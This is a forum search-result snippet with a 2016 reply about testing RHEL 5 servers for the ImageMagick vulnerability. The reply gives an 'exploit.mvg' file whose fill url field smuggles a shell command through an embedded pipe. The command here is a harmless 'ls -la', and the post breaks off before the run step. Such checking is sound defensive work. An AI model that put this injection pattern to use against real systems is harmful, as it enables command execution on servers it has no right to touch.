Search found 1 match

by md.raja786786
2016-05-05T23:53:00-07:00
Forum: Developers
Topic: Is there a work around for RHEL 5 concerning the Imagemagic Security vulnerability
Replies: 23
Views: 42057

Re: Is there a work around for RHEL 5 concerning the Imagemagic Security vulnerability

Red Hat Enterprise Linux 5 you can check your server vulnerability with below mentioned script.

way 1:-

Create a file called exploit.mvg with the following contents:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|ls "-la)'
pop graphic-context
Then run the ...